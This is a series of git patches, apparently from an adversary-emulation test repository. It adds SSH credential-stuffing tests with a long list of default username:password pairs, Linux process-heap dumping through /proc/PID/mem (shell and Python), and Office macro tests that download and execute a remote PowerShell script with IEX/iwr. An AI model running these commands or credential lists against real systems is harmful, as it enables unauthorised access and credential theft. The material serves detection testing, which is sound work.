From 8b308641929003da70f18d9a70f9468a2842af86 Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Mon, 7 Jun 2021 15:17:31 -0700 Subject: [PATCH 01/35] T1110.004 : SSH Credential Stuffing FROM Linux , MacOS --- atomics/T1110.004/T1110.004.yaml | 64 +++ atomics/T1110.004/src/credstuffuserpass.txt | 482 ++++++++++++++++++++ 2 files changed, 546 insertions(+) create mode 100644 atomics/T1110.004/T1110.004.yaml create mode 100644 atomics/T1110.004/src/credstuffuserpass.txt diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml new file mode 100644 index 00000000..29d8c304 --- /dev/null +++ b/atomics/T1110.004/T1110.004.yaml @@ -0,0 +1,64 @@ +--- +attack_technique: T1110.004 +display_name: 'Brute Force: Credential Stuffing' + +atomic_tests: +- name: SSH Credential Stuffing From Linux + description: | + Using username,password combination from a password dump to login over SSH. + + supported_platforms: + - linux + + input_arguments: + target_host: + description: IP Address / Hostname you want to target. + type: String + default: localhost + + dependency_executor_name: bash + dependencies: + - description: | + Requires SSHPASS + prereq_command: | + if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; + + executor: + name: bash + elevation_required: false + command: | + cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ + for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done + +- name: SSH Credential Stuffing From MacOS + description: | + Using username,password combination from a password dump to login over SSH. + + supported_platforms: + - macos + + input_arguments: + target_host: + description: IP Address / Hostname you want to target. + type: String + default: localhost + + dependency_executor_name: bash + dependencies: + - description: | + Requires SSHPASS + prereq_command: | + if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" + brew install hudochenkov/sshpass/sshpass + + executor: + name: bash + elevation_required: false + command: | + cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ + for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done + diff --git a/atomics/T1110.004/src/credstuffuserpass.txt b/atomics/T1110.004/src/credstuffuserpass.txt new file mode 100644 index 00000000..ed0295f7 --- /dev/null +++ b/atomics/T1110.004/src/credstuffuserpass.txt @@ -0,0 +1,482 @@ +ADMINISTRATOR:ADMINISTRATOR +ADMN:admn +Administrator:3ware +Administrator:admin +Administrator:changeme +Administrator:ganteng +Administrator:letmein +Administrator:password +Administrator:pilou +Administrator:smcadmin +Any:12345 +CSG:SESAME +Cisco:Cisco +D-Link:D-Link +DTA:TJM +GEN1:gen1 +GEN2:gen2 +GlobalAdmin:GlobalAdmin +HTTP:HTTP +IntraStack:Asante +IntraSwitch:Asante +JDE:JDE +LUCENT01:UI-PSWD-01 +LUCENT02:UI-PSWD-02 +MDaemon:MServer +MICRO:RSX +Manager:Manager +Manager:friend +NAU:NAU +NETWORK:NETWORK +NICONEX:NICONEX +PBX:PBX +PFCUser:240653C9467E45 +PRODDTA:PRODDTA +PSEAdmin:$secure$ +PlcmSpIp:PlcmSpIp +Polycom:SpIp +RMUser1:password +SYSADM:sysadm +Sweex:Mysweex +USERID:PASSW0RD +User:Password +VNC:winterm +VTech:VTech +ZXDSL:ZXDSL +acc:acc +adfexc:adfexc +admin:0 +admin:0000 +admin:1111 +admin:11111111 +admin:123 +admin:1234 +admin:123456 +admin:1234567890 +admin:1234admin +admin:2222 +admin:22222 +admin:3477 +admin:3ascotel +admin:7ujMko0admin +admin:7ujMko0vizxv +admin:9999 +admin:Admin +admin:AitbISP4eCiG +admin:Ascend +admin:BRIDGE +admin:Intel +admin:MiniAP +admin:NetCache +admin:NetICs +admin:OCS +admin:P@55w0rd! +admin:PASSWORD +admin:Protector +admin:SMDR +admin:SUPER +admin:Symbol +admin:TANDBERG +admin:_Cisco +admin:access +admin:admin +admin:admin117.35.97.74 +admin:admin123 +admin:admin1234 +admin:administrator +admin:adminttd +admin:adslolitec +admin:adslroot +admin:adtran +admin:articon +admin:asante +admin:ascend +admin:asd +admin:atc123 +admin:atlantis +admin:backdoor +admin:barricade +admin:barricadei +admin:bintec +admin:cableroot +admin:changeme +admin:cisco +admin:comcomcom +admin:conexant +admin:default +admin:diamond +admin:enter +admin:epicrouter +admin:extendnet +admin:fliradmin +admin:giraff +admin:hagpolm1 +admin:hello +admin:help +admin:hp.com +admin:ironport +admin:isee +admin:jvc +admin:kont2004 +admin:letmein +admin:leviton +admin:linga +admin:meinsma +admin:michaelangelo +admin:michelangelo +admin:microbusiness +admin:motorola +admin:mu +admin:my_DEMARC +admin:netadmin +admin:noway +admin:oelinux123 +admin:operator +admin:p-assword +admin:pass +admin:password +admin:passwort +admin:pento +admin:pfsense +admin:private +admin:public +admin:pwp +admin:radius +admin:rmnetlm +admin:root +admin:secure +admin:service +admin:setup +admin:sitecom +admin:smallbusiness +admin:smcadmin +admin:speedxess +admin:superuser +admin:support +admin:switch +admin:synnet +admin:sysAdmin +admin:system +admin:tech +admin:ubnt +admin:visual +admin:w2402 +admin:wbox +admin:xad$l#12 +admin:xad$|#12 +admin:zoomadsl +admin2:changeme +administrator:administrator +administrator:changeme +adminstat:OCS +adminstrator:changeme +adminttd:adminttd +adminuser:OCS +adminview:OCS +alpine:alpine +anonymous:Exabyte +anonymous:any@ +apc:apc +at4400:at4400 +bbsd-client:NULL +bbsd-client:changeme2 +bciim:bciimpw +bcim:bcimpw +bcms:bcmspw +bcnas:bcnaspw +bcnas:pcnaspw +blue:bluepw +browse:browsepw +browse:looker +cablecom:router +cablemodem:robotics +cac_admin:cacadmin +cas:cascade +ccrusr:ccrusr +cellit:cellit +cgadmin:cgadmin +cisco:cisco +citel:citel +client:client +cmaker:cmaker +comcast:1234 +corecess:corecess +craft:craft +craft:craftpw +craft:crftpw +cusadmin:highspeed +cust:custpw +customer:none +dadmin:dadmin01 +davox:davox +debug:d.e.b.u.g +debug:synnet +default:antslq +default:default +default:password +deskalt:password +deskman:changeme +desknorm:password +deskres:password +device:device +dhs3mt:dhs3mt +dhs3pms:dhs3pms +diag:danger +diag:switch +disttech:4tas +draytek:1234 +e250:e250changeme +e500:e500changeme +echo:User +echo:echo +eng:engineer +enquiry:enquirypw +field:support +guest:1111 +guest:12345 +guest:123456 +guest:User +guest:guest +guest:xc3511 +halt:tlah +helpdesk:OCS +hsa:hsadb +hscroot:abc123 +iclock:timely +images:images +inads:inads +inads:indspw +init:initpw +install:llatsni +install:secret +installer:installer +intel:intel +intermec:intermec +intermec:intermec1QTPS +kermit:kermit +l2:l2 +l3:l3 +locate:locatepw +login:0 +login:1111 +login:8429 +login:access +login:admin +login:password +lp:lp +m1122:m1122 +maint:maint +maint:maintpw +maint:ntacdmax +maint:rwmaint +manage:!manage +manager:admin +manager:change_on_install +manager:friend +manager:manager +manager:sys +manuf:xxyyzz +mediator:mediator +mg3500:merlin +mlusr:mlusr +monitor:monitor +mother:fucker +mtch:mtch +mtcl:mtcl +naadmin:naadmin +netangr:attack +netman:netman +netopia:netopia +netrangr:attack +netscreen:netscreen +nms:nmspw +nokai:nokai +nokia:nokia +none:0 +none:admin +op:op +op:operator +operator:$chwarzepumpe +operator:1234 +operator:operator +oracle:oracle +patrol:patrol +piranha:piranha +piranha:q +poll:tech +public:public +radware:radware +rapport:r@p8p0r+ +rcust:rcustpw +readonly:lucenttech2 +readwrite:lucenttech1 +recovery:recovery +replicator:replicator +ro:ro +root:000000 +root:1111 +root:1234 +root:12345 +root:123456 +root:1234567890 +root:1234qwer +root:123qwe +root:1q2w3e4r5 +root:3ep5w2u +root:54321 +root:666666 +root:7ujMko0admin +root:7ujMko0vizxv +root:888888 +root:Admin +root:Cisco +root:GMB182 +root:LSiuY7pOmZG2s +root:Mau'dib +root:PASSWORD +root:ROOT500 +root:Serv4EMC +root:Zte521 +root:abc123 +root:admin +root:admin1234 +root:admin_1 +root:ahetzip8 +root:alpine +root:anko +root:antslq +root:ascend +root:attack +root:avtech +root:b120root +root:bananapi +root:blender +root:calvin +root:changeme +root:cms500 +root:comcom +root:coolphoenix579 +root:davox +root:default +root:dreambox +root:fivranne +root:ggdaseuaimhrke +root:hi3518 +root:iDirect +root:ikwb +root:ikwd +root:jauntech +root:juantech +root:jvbzd +root:klv123 +root:klv1234 +root:letacla +root:maxided +root:oelinux123 +root:openssh +root:openvpnas +root:orion99 +root:pa55w0rd +root:pass +root:password +root:permit +root:realtek +root:root +root:tini +root:tslinux +root:ubnt +root:user +root:vizxv +root:wyse +root:xc3511 +root:xmhdipc +root:zlxx. +root:zte9x15 +router:router +rw:rw +rwa:rwa +scmadmin:scmchangeme +scout:scout +secret:secret +secure:secure +security:security +service:smile +setup:changeme +setup:changeme! +setup:setup +smc:smcadmin +spcl:0 +storwatch:specialist +stratacom:stratauser +su:super +super:5777364 +super:super +super:surt +super.super:master +superadmin:secret +superman:21241036 +superman:talent +superuser:123456 +superuser:admin +supervisor:PlsChgMe! +supervisor:PlsChgMe1 +supervisor:supervisor +supervisor:zyad1234 +support:123 +support:1234 +support:12345 +support:123456 +support:admin +support:h179350 +support:login +support:support +support:supportpw +support:zlxx. +sys:uplink +sysadm:Admin +sysadm:PASS +sysadm:anicust +sysadm:sysadm +sysadmin:PASS +sysadmin:password +sysadmin:sysadmin +system:change_on_install +system:password +system:sys +system/manager:sys/change_on_install +target:password +teacher:password +tech:ANYCOM +tech:ILMI +tech:field +tech:tech +telco:telco +telecom:telecom +tellabs:tellabs#1 +telnet:telnet +temp1:password +test:test +tiara:tiaranet +tiger:tiger123 +topicalt:password +topicnorm:password +topicres:password +ubnt:ubnt +user:123456 +user:pass +user:password +user:public +user:tivonpw +user:user +vcr:NetVCR +volition:volition +vt100:public +webadmin:1234 +webadmin:webadmin +websecadm:changeme +wlse:wlsedb +wradmin:trancell +write:private +xd:xd +xxx:cascade +zyfwp:PrOw!aN_fXp From 47e1147dc1299bd7ae92677b20bcf9b22bdc25ff Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Fri, 4 Jun 2021 17:14:49 -0600 Subject: [PATCH 02/35] Added T1003.007 OS Credential Dumping: Proc Filesystem --- atomics/T1003.007/T1003.007.yaml | 56 ++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 atomics/T1003.007/T1003.007.yaml diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml new file mode 100644 index 00000000..5ed6039e --- /dev/null +++ b/atomics/T1003.007/T1003.007.yaml @@ -0,0 +1,56 @@ +--- +attack_technique: T1003.007 +display_name: 'OS Credential Dumping: Proc Filesystem' +atomic_tests: +- name: Dump individual process memory (Local) + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, + copy process memory to an external file so it can be searched or exfiltrated later. + + supported_platforms: + - linux + + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: /tmp/T1003.007.bin + script_path: + description: Path to script generating the target process + type: Path + default: /tmp/T1003.007.sh + pid_term: + description: Unique string to use to identify target process + type: String + default: T1003.007 + + dependencies: + - description: | + Script to launch target process must exist + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + - description: | + Script to launch target process must be executable + prereq_command: | + test -x #{script_path} + get_prereq_command: | + chmod +x #{script_path} + + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1) + MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1)))) + MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2)))) + MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START))) + dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE" + grep -i "PASS" "#{output_file}" + cleanup_command: | + rm -f "#{output_file}" From 6b3206b3789d24064cc43359a19aa9f1763ab748 Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Tue, 8 Jun 2021 16:49:23 -0600 Subject: [PATCH 03/35] added Python script for T1003.007 --- atomics/T1003.007/T1003.007.yaml | 64 ++++++++++++++++++++++++++---- atomics/T1003.007/src/dump_heap.py | 31 +++++++++++++++ 2 files changed, 87 insertions(+), 8 deletions(-) create mode 100644 atomics/T1003.007/src/dump_heap.py diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml index 5ed6039e..d6e49b4a 100644 --- a/atomics/T1003.007/T1003.007.yaml +++ b/atomics/T1003.007/T1003.007.yaml @@ -2,9 +2,9 @@ attack_technique: T1003.007 display_name: 'OS Credential Dumping: Proc Filesystem' atomic_tests: -- name: Dump individual process memory (Local) +- name: Dump individual process memory with sh (Local) description: | - Using `/proc/$PID/mem`, where $PID is the target process ID, + Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. supported_platforms: @@ -33,12 +33,6 @@ atomic_tests: get_prereq_command: | echo '#!/bin/sh' > #{script_path} echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - - description: | - Script to launch target process must be executable - prereq_command: | - test -x #{script_path} - get_prereq_command: | - chmod +x #{script_path} executor: name: sh @@ -54,3 +48,57 @@ atomic_tests: grep -i "PASS" "#{output_file}" cleanup_command: | rm -f "#{output_file}" + +- name: Dump individual process memory with Python (Local) + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to + copy a process's heap memory to an external file so it can be searched or exfiltrated later. + + supported_platforms: + - linux + + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: /tmp/T1003.007.bin + script_path: + description: Path to script generating the target process + type: Path + default: /tmp/T1003.007.sh + python_script: + description: Path to script generating the target process + type: Path + default: PathToAtomicsFolder/T1003.007/src/dump_heap.py + pid_term: + description: Unique string to use to identify target process + type: String + default: T1003.007 + + dependencies: + - description: | + Script to launch target process must exist + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + - description: | + Requires Python + prereq_command: | + (which python || which python3 || which python2) + get_prereq_command: | + echo "Python 2.7+ or 3.4+ must be installed" + + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + PYTHON=$(which python || which python3 || which python2) + $PYTHON #{python_script} $PID #{output_file} + grep -i "PASS" "#{output_file}" + cleanup_command: | + rm -f "#{output_file}" diff --git a/atomics/T1003.007/src/dump_heap.py b/atomics/T1003.007/src/dump_heap.py new file mode 100644 index 00000000..34d479c7 --- /dev/null +++ b/atomics/T1003.007/src/dump_heap.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python +'''Dump a process's heap space to disk + +Usage: + python dump_proc.py +''' +import argparse + + +parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk') +parser.add_argument('pid', type=int, help='ID of process to dump') +parser.add_argument('filepath', help='A filepath to save output to') +args = parser.parse_args() + +process_id = args.pid +output_file = args.filepath + +with open("/proc/{}/maps".format(process_id), "r") as maps_file: + # example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0 [heap] + heap_line = next(filter(lambda line: "[heap]" in line, maps_file)) + heap_range = heap_line.split(' ')[0] + mem_start = int(heap_range.split('-')[0], 16) + mem_stop = int(heap_range.split('-')[1], 16) + mem_size = mem_stop - mem_start + +with open("/proc/{}/mem".format(process_id), "rb") as mem_file: + mem_file.seek(mem_start, 0) + heap_mem = mem_file.read(mem_size) + +with open(output_file, "wb") as ofile: + ofile.write(heap_mem) From a3e66311c51e1f9e1727b6946e68a621c4bdf521 Mon Sep 17 00:00:00 2001 From: SecurityShrimp Date: Wed, 9 Jun 2021 11:51:35 -0500 Subject: [PATCH 04/35] Update T1204.002.yaml (#1503) added pls version setting to tests using IWR Co-authored-by: Carrie Roberts --- atomics/T1204.002/T1204.002.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index 971dda55..8c749447 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -36,6 +36,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -91,6 +92,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -126,6 +128,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -160,6 +163,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} @@ -285,6 +289,7 @@ atomic_tests: Write-Host "You will need to install Google Chrome manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell From 7e64b11098bbae06475f2745b78332ff68ebd058 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Jun 2021 16:52:02 +0000 Subject: [PATCH 05/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 5 +++++ atomics/T1204.002/T1204.002.md | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ffb927c7..db3672dc 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -58262,6 +58262,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -58323,6 +58324,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -58361,6 +58363,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -58398,6 +58401,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} @@ -58532,6 +58536,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md index eda78a1e..fdd9a4c2 100644 --- a/atomics/T1204.002/T1204.002.md +++ b/atomics/T1204.002/T1204.002.md @@ -50,6 +50,7 @@ References: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -138,6 +139,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -188,6 +190,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -237,6 +240,7 @@ Microsoft Office creating then launching a .bat script from an AppData directory ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} @@ -390,6 +394,7 @@ and pull down the script and execute it. By default the payload will execute cal ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" ``` From 0b52ed3a400f1afacb7860e75416bb849325b60b Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 9 Jun 2021 10:55:25 -0600 Subject: [PATCH 06/35] remove unused arg, utilize other arg (#1497) --- atomics/T1221/T1221.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/atomics/T1221/T1221.yaml b/atomics/T1221/T1221.yaml index 631277c1..3c554c5f 100644 --- a/atomics/T1221/T1221.yaml +++ b/atomics/T1221/T1221.yaml @@ -4,18 +4,17 @@ atomic_tests: - name: WINWORD Remote Template Injection auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d description: | - Open a .docx file that loads a remote .dotm macro enabled template. Executes the code specified within the .dotm template.Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens Calculator.exe when test sucessfully executed, while AV turned off. + Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm + Executes the code specified within the .dotm template. + Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. + Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off. supported_platforms: - windows input_arguments: - docx file: + docx_file: description: Location of the test docx file on the local filesystem. type: Path default: PathToAtomicsFolder\T1221\src\Calculator.docx - dotm template: - description: Location of the test dotm template on the remote server. - type: Path - default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm dependency_executor_name: powershell dependencies: - description: | @@ -23,5 +22,5 @@ atomic_tests: get_prereq_command: | executor: command: | - start PathToAtomicsFolder\T1221\src\Calculator.docx + start #{docx_file} name: command_prompt From 1203ffc740b4d70073337b7dd30c2af1d5715e51 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Jun 2021 16:56:00 +0000 Subject: [PATCH 07/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 20 ++++++++------------ atomics/T1221/T1221.md | 10 ++++++---- 2 files changed, 14 insertions(+), 16 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index db3672dc..6715564c 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -34289,30 +34289,26 @@ defense-evasion: atomic_tests: - name: WINWORD Remote Template Injection auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d - description: 'Open a .docx file that loads a remote .dotm macro enabled template. - Executes the code specified within the .dotm template.Requires download of - WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens - Calculator.exe when test sucessfully executed, while AV turned off. - -' + description: "Open a .docx file that loads a remote .dotm macro enabled template + from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm + \nExecutes the code specified within the .dotm template.\nRequires download + of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. + \ \nDefault docs file opens Calculator.exe when test sucessfully executed, + while AV turned off.\n" supported_platforms: - windows input_arguments: - docx file: + docx_file: description: Location of the test docx file on the local filesystem. type: Path default: PathToAtomicsFolder\T1221\src\Calculator.docx - dotm template: - description: Location of the test dotm template on the remote server. - type: Path - default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm dependency_executor_name: powershell dependencies: - description: '' prereq_command: '' get_prereq_command: '' executor: - command: 'start PathToAtomicsFolder\T1221\src\Calculator.docx + command: 'start #{docx_file} ' name: command_prompt diff --git a/atomics/T1221/T1221.md b/atomics/T1221/T1221.md index fbad78bd..9f9d5708 100644 --- a/atomics/T1221/T1221.md +++ b/atomics/T1221/T1221.md @@ -16,7 +16,10 @@ This technique may also enable [Forced Authentication](https://attack.mitre.org/
